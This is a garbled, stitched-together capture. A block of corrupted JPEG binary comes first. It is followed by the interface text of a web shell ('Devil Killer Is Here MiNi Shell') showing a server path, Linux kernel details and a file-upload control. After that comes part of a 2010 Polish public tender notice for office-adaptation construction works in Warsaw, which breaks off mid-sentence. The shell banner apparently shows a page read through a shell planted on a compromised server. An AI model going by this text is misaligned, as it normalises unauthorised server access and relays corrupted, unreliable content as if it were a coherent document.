JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100830/269638-N-2010.html

<p class="kh_header"><b>Warszawa: Wykonanie adaptacji pomieszczeń usługowych na parterze budynku przy ul. Smoluchowskiego 2 w Warszawie na pomieszczenia biurowe</b><br>
<b>Numer ogłoszenia: 269638 - 2010; data zamieszczenia: 30.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie adaptacji pomieszczeń usługowych na parterze budynku przy ul. Smoluchowskiego 2 w Warszawie na pomieszczenia biurowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia oraz warunki jego realizacji i gwarancji. 
1.1. Wykonawca zobowiązany będzie do wykonania robót polegających na wykonaniu   
         adaptacji pomieszczeń usługowych na parterze budynku przy ul. Smoluchowskiego 
         2 w Warszawie na pomieszczenia biurowe zgodnie z projektem wykonawczym 
         Projekt adaptacji pomieszczeń usługowych na parterze budynku przy ul. 
         Smoluchowskiego 2 w Warszawie na pomieszczenia biurowe wraz z dociepleniem 
         ściany zachodniej i południowej  autorstwa Studia PLUM s.c. Piotr Pleskot, 
         Noemi  Mezei ul. Meksykańska 8 m 92 Warszawa oraz Zespołu Usług 
         Projektowych RAB  Andrzej  i Bogumiła Rzepeccy ul. Niedźwiedzia 8D 16  
           Warszawa.

1.1.1. W zakres przedmiotu zamówienia wejdą 
1.1.1.1. Roboty budowlane 
       1.1.1.1.1. wyburzenie istniejących ścianek działowych GK wraz z demontażem istniejącej 
                     stolarki drzwiowej
       1.1.1.1.2. rozebranie istniejących sufitów podwieszanych wraz z wbudowanymi 
                    instalacjami wewnętrznymi 
       1.1.1.1.3. zdjęcie górnej warstwy okładziny ceramicznej z terakoty na parterze, a w
                    miejscach projektowanych pomieszczeń mokrych także dolną warstwę gresu aż 
                    do podkładu betonowego
       1.1.1.1.4. wybicie nowych otworów okiennych w ścianach południowej i zachodniej oraz 
                      w  projektowanej łazience dla niepełnosprawnych wraz z wykonaniem
                      koniecznych  nadproży 
       1.1.1.1.5. postawienie nowych ścianek działowych gipsowo-kartonowych w celu  
                    wydzielenia pomieszczeń biurowych nr 02, 03, 04, 05, 06, 07, archiwum nr 15, 
                    serwera nr 17, pomieszczenia gospodarczego nr 10, łazienek z w.c. nr 11A, 11B,
                   12, 13 A, 13B, przedsionka nr 19 i komunikacji nr 20. Numeracja pomieszczeń 
                    zgodnie z dokładnością projektową 
      1.1.1.1.6. ułożenie posadzek z gresu i z wykładziny PCV w pomieszczeniach zgodnie z 
                   dokumentacją projektową 
      1.1.1.1.7. licowanie ścian płytkami glazurowanymi na zaprawie klejowej (pom. gosp.
                     i w.c.)
      1.1.1.1.8. wykonanie nowych sufitów podwieszanych rozbieralnych i pełnych zgodnie z 
                  projektem 
      1.1.1.1.9. montaż okien z PCV od strony południowej i zachodniej budynku wraz z 
                   nawiewnikami i parapetami zewnętrznymi i wewnętrznymi
     1.1.1.1.10. wymiana stolarki drzwiowej wraz z ościeżnicami na drzwi drewniane 
     1.1.1.1.11. montaż drzwi z PCV wysokoudarowego w kolorze białym w przedsionku
     1.1.1.1.12. trzykrotne malowanie farbami emulsyjnymi powierzchni wewnętrznych z 
                    gruntowaniem ( pokoje biurowe, w.c., archiwum, serwer, komunikacja )

     1.1.1.2. Roboty sanitarne 
     1.1.1.2.1. wymianę instalacji c.w. i z.w. oraz instalacji kanalizacyjnej
     1.1.1.2.2. wymianę instalacji c.o.
     1.1.1.2.3. montaż instalacji wentylacji mechanicznej

     1.1.1.3. Roboty elektryczne i teletechniczne
     1.1.1.3.1. demontaż istniejącej instalacji elektrycznych osprzętu, oświetlenia i tablic z 
                     zabezpieczeniami
     1.1.1.3.2. wymiany tablicy głównej TG i tablicy piętrowej TP
     1.1.1.3.3. montaż opraw oświetleniowych i ich zasilania 
     1.1.1.3.4. montaż gniazd wtyczkowych 230 V i ich zasilania 
     1.1.1.3.5. instalacji siłowej obejmującej zasilanie i sterowanie wentylacją oraz 
                     urządzeniami klimatyzacji 
     1.1.1.3.6. instalacji przeciwporażeniowej i wyrównawczej 
     1.1.1.3.7. okablowania strukturalnego i sieci komputerowej 
     1.1.1.3.8. instalacji teletechnicznej 


 
Z  projektu wyłącza się remont pomieszczeń nr 01, 08, 09, 14, 16, 18, 21 jak 
     również prace zewnętrzne tj. remont schodów ewakuacyjnych, wykonanie 
pochylni dla niepełnosprawnych oraz docieplenie ścian zachodniej i 
     południowej budynku.

1.2. Wymagania dotyczące stolarki okiennej: okna PCV 
1.2.1. Montowana stolarka okienna oraz wszystkie jej elementy tj. okucia okienne, szyby, nawiewniki higrosterowane muszą posiadać Aprobaty Techniczne wraz z deklaracją zgodności z aprobatą lub dokument równoważny zgodny z  Ustawą o wyrobach budowlanych z dnia 16 kwietnia 2004 roku  Dz.U.04.92.881 określający, że wyrób jest dopuszczony do stosowania w obiektach budownictwa mieszkaniowego i użyteczności publicznej.

2. Czynności, o których mowa w pkt. 3.1. specyfikacji istotnych warunków zamówienia będą wykonywane pod nadzorem Działu Technicznego DOM Służewiec w Dzielnicy Mokotów m.st. Warszawy, 02-679 Warszawa, ul. Smoluchowskiego 2.

3. Wszędzie tam gdzie w specyfikacji i jej załącznikach wymieniono z nazwy typ lub producenta materiałów lub urządzeń, Zamawiający dopuszcza rozwiązania równoważne. 

4. Warunki realizacji zamówienia i gwarancji zawierają dokumentacje projektowo techniczne   - stanowiące Rozdział VI SIWZ, przedmiary robót - stanowiące Rozdział IV SIWZ, specyfikacje techniczne wykonania i odbioru robót stanowiące Rozdział V SIWZ, decyzja Nr 397  2010 z dnia 25.06.2010r. stanowiąca Rozdział VII specyfikacji istotnych warunków zamówienia, Uzupełnienie do Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych stanowiące Rozdział VIII specyfikacji istotnych warunków zamówienia oraz Istotne postanowienia umowy stanowiące Rozdział III specyfikacji istotnych warunków zamówienia.  

5. Czynności, o których mowa w pkt. 3.1. specyfikacji istotnych warunków zamówienia, mają być wykonywane  zgodnie z

5.1. Projektami adaptacji pomieszczeń usługowych na parterze budynku przy ul.
           Smoluchowskiego 2 w Warszawie na pomieszczenia biurowe wraz z ociepleniem
           ściany zachodniej i południowej, autorstwa Konsorcjum  Studio PLUM Spółka
           Cywilna Piotr Pleskot, Noemi Mezei ul. Meksykańska 8 m 92 03-948 Warszawa  
           RAB Zespół Usług Projektowych Andrzej i Bogumiła Rzepeccy ul. Niedźwiedzia 
           8D 16  02-737 Warszawa,  wykonanymi w sierpniu  2009 r.               
           Części opracowania                  
           - PT Architektury                            
           - PT Konstrukcji                        
           - PT Instalacji Centralnego Ogrzewania                           
           - PT Instalacji Elektrycznej i Teletechnicznej                             
           - PT Instalacji Wentylacji Mechanicznej                            
           - PT Instalacji Wodno - Kanalizacyjnej 
           stanowiącymi Rozdział VI specyfikacji istotnych warunków zamówienia


  5.2.  przedmiarami robót branży ogólnobudowlanej, sanitarnej i elektrycznej , które stanowią Rozdział IV siwz, 
   5.3. Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych do 
             projektu adaptacji pomieszczeń usługowych na parterze budynku przy ul. 
             Smoluchowskiego 2 w  Warszawie na pomieszczenia biurowe wraz z 
             dociepleniem ściany zachodniej i południowej, opracowanymi w sierpniu 2009r. 
             przez Konsorcjum  Studio PLUM Spółkę Cywilną Piotr Pleskot, Noemi Mezei ul. 
              Meksykańska 8 m 92 03-948 Warszawa , RAB Zespół Usług Projektowych 
              Andrzej i Bogumiła Rzepeccy ul. Niedźwiedzia 8D 16   02-737 Warszawa,         
             Części opracowania                
              - STWiOR dotycząca Instalacji Elektrycznej i Teletechnicznej               
              - STWiOR dotyczaca Konstrukcji      
              - STWiOR dotycząca Architektury                           
              - STWiOR dotycząca Instalacji  wentylacji mechanicznej, Instalacji  c. o., 
                 Instalacji  wod. kan. stanowiącymi Rozdział V specyfikacji istotnych warunków 
                 zamówienia,
 5.4.   decyzją Nr 397   2010 z dnia 25.06.2010r. stanowiącą Rozdział VII specyfikacji istotnych warunków zamówienia.
 5.5.   Uzupełnieniem do Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych stanowiącym Rozdział VIII specyfikacji istotnych warunków zamówienia,     
5.6.	warunkami wynikającymi z przepisów technicznych i czynnościami wymienionymi w art. 22 Ustawy z dnia 07.07.1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156, poz.1118, ze zmianami)  i jej przepisów wykonawczych,
5.7.  wymaganiami wynikającymi z aktualnych Polskich Norm i aprobat technicznych,
       5.8.  zgodnie z zasadami rzetelnej wiedzy technicznej i sztuką budowlaną,
    5.9. warunkami wynikającymi z Istotnych postanowień umowy stanowiących Rozdział III specyfikacji istotnych warunków zamówienia.
        5.9.1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy  zawartej w wyniku rozstrzygnięcia przedmiotowego postępowania, o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego oraz w przypadku zmiany porządku prawnego, a także w przypadku zmian zawartych w specyfikacji istotnych warunków zamówienia w tym 
                               5.9.1.1.w przypadku wystąpienia okoliczności uniemożliwiających prowadzenie robót zgodnie z technologią ich wykonania termin realizacji robót może ulec zmianie. Zostanie on wydłużony o okres, na który roboty zostały wstrzymane. Fakt ten musi być potwierdzony wpisem Zamawiającego do dziennika robót, o którym mowa w ust. 6.
                              5.9.1.2. Zamawiający zastrzega sobie możliwość rezygnacji z wykonania części robót objętych Zamówieniem, nie więcej jednak niż 20 % wartości zamówienia. 
                              5.9.1.3. Wykonawca w trakcie realizacji przedmiotu zamówienia może dokonać zmiany Podwykonawców w sytuacji, gdy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy, koniecznym będzie dla prawidłowego wykonania umowy posłużenie się przez Wykonawcę nowymi Podwykonawcami, którzy będą realizowali część lub cały zakres powierzony uprzednio innym Podwykonawcom.
                              5.9.1.4.w przypadku zaistnienia konieczności wykonania robót dodatkowych, które nie zostały przewidziane w przedmiarze robót stanowiącym Rozdział IV siwz, Wykonawca zobowiązany jest wykonać je na odrębne zlecenie Zamawiającego. Wartość robót dodatkowych nie może  przekroczyć 50% wartości realizowanego zamówienia. 
                               5.9.1.5. zmiana terminu wykonania przedmiotu zamówienia może nastąpić w przypadku określonym w pkt. 3.5.9.1.1., SIWZ a także, jeżeli w następstwie wydłużonych wykraczających poza ustawowe terminy procedur administracyjnych oraz innych terminów spraw urzędowych, mających wpływ na terminy realizacji przedmiotu zamówienia Wykonawca przy wykazaniu należytej staranności nie może dotrzymać terminu wykonania przedmiotu zamówienia;
                              5.9.1.6. zmiany stawki podatku od towarów i usług (VAT)
                              5.9.1.7. ograniczenia środków budżetowych na realizację przedmiotu 
                                                 zamówienia
                              5.9.1.8.ograniczenia zakresu rzeczowego i finansowego;
                              5.9.1.9. zmiany osób uczestniczących w realizacji przedmiotu zamówienia;
                              5.9.1.10.zmiany zakresu części przedmiotu zamówienia powierzonych 
                                               podwykonawcom
                                5.9.1.11.zmiany wymaganej sprawozdawczości i rozliczeń kosztów wykonania  
                                                   przedmiotu zamówienia
                              5.9.1.12.zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia umowy wraz ze skutkami takiej zmiany regulacji prawnych.

6. Wykonawca zobowiązany będzie do stosowania w trakcie wykonywania zamówienia materiałów i produktów odpowiadających wymaganiom ujętych w art. 10 ustawy Prawo budowlane i w Ustawie o wyrobach budowlanych. Jeżeli na przewidywany do wykorzystania materiał lub wyrób nie ustanowiono normy technicznej to Wykonawca musi posiadać następujące, aktualne dokumenty: krajowe aprobaty techniczne (AT) lub europejskie aprobaty techniczne (ETA). Normy techniczne, których wymagania muszą spełniać stosowane materiały i wyroby, są wymienione w specyfikacjach technicznych wykonania i odbioru robót (4 STWiOR), stanowiących Rozdział V SIWZ,  dokumentacji projektowej ( 6 PT) -stanowiącej  Rozdział VI SIWZ, przedmiarach robót (5 szt.) - stanowiących Rozdział IV SIWZ. Wykonawca, uzupełnieniu do specyfikacji technicznej wykonania i odbioru robót budowlanych - stanowiącym Rozdział VIII specyfikacji istotnych warunków zamówienia,  zobowiązany będzie do przedłożenia Zamawiającemu przed rozpoczęciem wykonywania robót w w dokumentów dotyczących stosowanych materiałów.
      	Ponadto podczas wykonywania zamówienia Wykonawca na każde żądanie Zamawiającego zobowiązany będzie okazać w stosunku do wskazanych materiałów certyfikat na znak bezpieczeństwa, deklaracje zgodności lub certyfikat zgodności z Polską Normą lub z aktualną aprobatą techniczną.
     6.1.  Montowana stolarka okienna oraz wszystkie jej elementy tj. okucia okienne, szyby, nawiewniki higrosterowane muszą posiadać Aprobaty Techniczne wraz z deklaracją zgodności z aprobatą lub dokument równoważny zgodny z  Ustawą o wyrobach budowlanych z dnia 16 kwietnia 2004 roku  Dz.U.04.92.881 określający, że wyrób jest dopuszczony do stosowania w obiektach budownictwa mieszkaniowego i użyteczności publicznej.
              
               6.2. Wykonane roboty oraz użyte materiały do wykonania przedmiotu zamówienia jak i  zamontowane zestawy okienne z wywietrznikiem muszą spełniać wymogi art. 10   ustawy Prawo Budowlane z późn. zmianami w nawiązaniu z art. 5 ust. 1 lit. a, oraz ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. Nr 92 poz. 881), ponadto dostosowane odpowiednio do instrukcji montażu producenta  oraz specyfikacji technicznej wykonania i odbioru robót budowlanych stanowiącej Rozdział V specyfikacji istotnych warunków zamówienia oraz uzupełnienia do specyfikacji technicznej wykonania i odbioru robót budowlanych stanowiącego Rozdział VIII specyfikacji istotnych warunków zamówienia.

7. Wykonawca zobowiązany będzie do:
         7.1. prowadzenia dziennika budowy (prac), dostarczonego przez Zamawiającego w  dniu rozpoczęcia robót, 
         7.2. posiadania opłaconej polisy lub innego dokumentu ubezpieczenia na kwotę nie  
                   niższą niż równowartość 150.000 złotych polskich,  potwierdzającego, że jest
                   ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
                   działalności gospodarczej, w  tym w zakresie przedmiotu zamówienia, 
   7.3. zabezpieczenia obiektu w trakcie wykonywania robót budowlanych przed   skutkami niepożądanych zdarzeń przez cały czas realizacji umowy,
          7.4. dokonania we własnym zakresie i na własny koszt organizacji placu budowy oraz 
                     zorganizowania zaplecza socjalno-technicznego w rozmiarach koniecznych dla przeprowadzenia robót, 
    7.5.   umożliwienia Zamawiającemu w każdym czasie przeprowadzenie kontroli placu budowy, realizowanych robót budowlanych, stosowanych w ich toku wyrobów oraz innych okoliczności dotyczących bezpośredniej realizacji zamówionego dzieła budowlanego,
         7.6. utrzymania w czasie realizacji przedmiotu zamówienia ładu i porządku na terenie i obiekcie, na którym wykonuje roboty oraz uporządkuje teren i obiekt po zakończeniu robót, a także zapewni warunki bezpieczeństwa i p.poż.
 7.7. wykonywania robót wyłącznie przez pracowników posiadających kwalifikacje zawodowe odpowiadające rodzajom prac objętych przedmiotem zamówienia,
        7.8.  poniesienia całkowitej odpowiedzialności prawnej i finansowej wobec Zamawiającego i osób trzecich za wszelkie szkody wynikłe z zaniechania realizacji umowy, niedbalstwa lub działania niezgodnego z umową, ze sztuką budowlaną, przepisami p. poż., a także nieprawidłowego zabezpieczenia lub jego braku narzędzi, materiałów, placu budowy i terenu pod zaplecze budowy,
        7.9. Wykonawca wybrany do podpisania umowy zobowiązany będzie załączyć do umowy kserokopie potwierdzone przez Wykonawcę za zgodność z oryginałem uprawnień budowlanych w zakresie ogólnobudowlanym, sanitarnym i elektrycznym oraz kserokopię aktualnego zaświadczenia o wpisie na listę, właściwej izby samorządu zawodowego osoby, która będzie kierownikiem prac, o której mowa w pkt. 8.1.3. specyfikacji.  

 8. W okresie realizacji przedmiotu zamówienia Wykonawca może korzystać z instalacji wodno  kanalizacyjnej i energii elektrycznej na warunkach określonych w Istotnych postanowieniach umowy, które stanowią Rozdział III specyfikacji istotnych warunków zamówienia.

 9. Wykonawca zobowiązany będzie do udzielenia gwarancji na wykonane przez siebie roboty będące przedmiotem zamówienia, o których mowa w pkt. 3.1. specyfikacji istotnych warunków zamówienia oraz w § 1 Istotnych postanowień umowy (Rozdział III specyfikacji) oraz zastosowane materiały, na czas min. 3 lat od daty bezusterkowego odbioru końcowego tych robót z tym, że dla materiałów okres ten nie może być krótszy niż gwarancja udzielona przez producenta nie krócej jednak niż 3 lata oraz zamontowaną stolarkę okienną i nawiewniki higrosterowane w tym na niezmienność barwy stolarki okiennej (okien) i nawiewników na czas minimum 7 lat od daty bezusterkowego odbioru końcowego tych robót.  

 
10. Zaoferowana przez Wykonawcę we - WZORZE FORMULARZA OFERTY -stawka roboczogodziny kosztorysowej brutto nie może przekroczyć średniej  warszawskiej określonej w wyd. Sekocenbud  Biuletyn cen regionalnych w budownictwie  BCR  dla II kw. 2010 r.  wynoszącej dla robót ogólnobudowlanych Rbrutto= 31,86 PLN , sanitarnych Rbrutto= 30,06 PLN, elektrycznych: Rbrutto= 28,31 PLN.  Stawka roboczogodziny kosztorysowej brutto obejmuje wartość stawki roboczogodziny kosztorysowej netto powiększonej o narzut kosztów pośrednich i zysk kalkulacyjny [Rbrutto = (Rnetto +  Kp  + Z)]. Wykonawca musi wpisać oferowane stawki robocizny kosztorysowej Rnetto i Rbrutto, Kp i Z w formularzu oferty, sporządzonym wg wzoru formularza oferty. 

11.  Zaoferowany przez Wykonawcę we - WZORZE FORMULARZA OFERTY - wskaźnik narzutu kosztów zakupu materiałów (Wkz) nie może być wyższy niż średni w Warszawie określony w wyd. Sekocenbud  Biuletyn cen regionalnych w budownictwie  BCR  dla II kw. 2010 r. i wynoszący dla robót ogólnobudowlanych: Wkz =  9,4 %, sanitarnych Wkz = 7,8 %, elektrycznych Wkz =  6,8 %. Wykonawca musi wpisać oferowane Wkz w formularzu oferty,  sporządzonym wg wzoru formularza oferty - Rozdział II specyfikacji istotnych warunków zamówienia.    


      12. Zastosowane przez Wykonawcę do wyceny robót budowlanych stanowiących przedmiot zamówienia ceny materiałów - bez kosztów zakupu - nie mogą być wyższe niż średnie ceny warszawskie - bez kosztów zakupu - publikowane przez Sekocenbud w II kwartale 2010 r., przy czym suma cen materiałów (bez podatku VAT i kosztów zakupu) nie może być wyższa  niż  189.176,13zł.

13.  Zastosowane przez Wykonawcę do wyceny robót budowlanych stanowiących przedmiot zamówienia ceny pracy sprzętu nie mogą być wyższe niż średnie ceny publikowane przez Sekocenbud w II kwartale 2010 r., przy czym suma cen pracy sprzętu (bez podatku VAT i narzutów) nie może być wyższa niż  4.550,72zł.


14. Wykonawca musi się zobowiązać do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % wartości oferty brutto, na zasadach określonych w pkt. 20 specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający przewiduje możliwość udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy robót zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.12.20-6, 45.26.25.00-0, 45.42.11.46-9, 45.41.00.00-4, 45.42.10.00-4, 45.42.11.30-4, 45.42.11.00-5, 45.43.00.00-0, 45.43.12.00-9, 45.43.00.00-0, 45.44.21.00-8, 45.26.13.10-0, 45.31.00.00-3, 45.31.40.00-1, 45.14.32.00-0, 45.31.42.00-3, 45.33.00.00-9, 45.33.11.00-7, 45.33.12.00-8, 45.33.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem przystąpienia do przetargu jest wniesienie wadium w wysokości:
5.000,- zł (słownie: pięć tysięcy  złotych) do dnia  15.09.2010 r. do godz. 1000.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
na podstawie art. 24 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2007 r. Nr 223, poz. 1655 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
         Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 5 do wzoru formularza oferty ( pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie spełniania warunków 
w zakresie wskazanym poniżej:
1.1. Zamawiający oceni jako spełniony, warunek posiadania przez Wykonawcę wiedzy i doświadczenia, na podstawie wykazu robót budowlanych, z którego wynikać będzie, że Wykonawca w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył 
